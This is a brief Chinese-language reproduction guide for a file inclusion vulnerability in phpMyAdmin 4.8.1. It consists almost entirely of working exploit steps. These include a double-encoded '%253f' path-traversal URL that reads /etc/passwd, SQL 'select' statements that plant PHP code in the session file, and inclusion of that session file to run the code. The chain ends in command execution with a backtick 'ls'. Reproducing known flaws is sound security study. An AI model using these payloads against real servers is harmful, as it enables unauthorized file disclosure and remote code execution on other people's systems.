0x01 简介
phpMyadmin 4.8.1版本的index.php中存在文件包含漏洞,通过二次编码可绕过过滤。
0x02 漏洞复现
1.将?进行两次URL编码为"%253f",构造下列payload:
http://xxx:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
漏洞存在。
2.在SQL中执行select ‘<?php phpinfo() ?>’;,然后查看当前页面cookie中的phpmyadmin的值。
3.查看服务器的session文件。
4.包含session文件。
http://xxx:8080/index.php?target=db_sql.php%253f/../../../../../../../../tmp/sess_5160933e2be04f36fccdd4695d6dbef3
5.构造执行命令的语句。
select '<?php echo `ls` ?>';
返回命令执行的结果。